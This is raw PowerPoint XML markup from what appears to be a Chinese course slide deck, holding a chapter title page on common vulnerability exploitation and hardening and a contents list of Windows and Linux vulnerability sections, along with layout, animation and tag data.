            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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84400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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98800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>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013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>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23875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>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59355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>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266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>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443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>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699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>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604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>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23875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>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14400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>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828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>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743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>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3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>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4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>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047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>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14400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>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3317240" y="1901190"/>
            <a:ext cx="574675" cy="57467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2049"/>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3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="25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1"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>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21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="2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par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="429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50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10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="55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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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1"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="76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1"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="6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3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11"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354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangl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2661019" y="3013987"/>
            <a:ext cx="7426325" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>常见漏洞利用与加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>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a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="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1071996" y="276662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a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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4560431" y="181968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4560431" y="272583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4560431" y="36616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5466102" y="1837433"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4529939" y="1005461"/>
              <a:ext cx="3228975"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3.1Windows</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>操作系统漏洞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5466102" y="2762971"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147"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3.2</a:t>
              </a:r>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Windows</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5466102" y="3688507"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>3.3Linunx</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服务漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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0-#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1" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>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TABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="482*134"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="74*209*482*134"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="409*383"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="41*124*409*383"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*176"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*176"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>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PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag121.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="482*134"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="74*209*482*134"/>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TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="409*383"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="41*124*409*383"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag163.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*293"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*293"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag167.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag168.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="482*134"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="74*209*482*134"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{22b5d72d-1b1f-45b4-94d6-b063b6f56af9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="416*457"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="441*28*416*457"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="409*383"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="41*124*409*383"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag203.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*293"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*293"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag207.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag208.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="482*134"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="74*209*482*134"/>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ABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="576*111"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="117*238*576*11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UNIT_TABLE_BEAUTIFY" val="smartTable{77228ce7-9028-4bb6-a618-13bdffe34cf2}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="409*383"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="41*124*409*383"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag246.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*293"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*293"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>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PP_MARK_KEY" val="0b39fdc4-c042-4361-aa1e-da0ba7bcedd1"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNTQ4NDMxOGUwZTdmMDgyMmRjZjFhZTNmNWNkZGUxNGMifQ=="/>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TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*176"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*176"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{da6a727b-bbd5-44fe-934e-fdef9be23e74}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="576*111"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="117*238*576*111"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{c06b54bb-96e9-4d02-bb1c-9ac2c001fb5a}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_TABLE_BEAUTIFY" val="smartTable{245ba169-fda2-422f-907a-0721544312b9}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="417*176"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="486*133*417*176"/>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 name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>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0.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="9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1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="10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2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="10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3.xml><?xml version="1.0" encoding="utf-8"?>
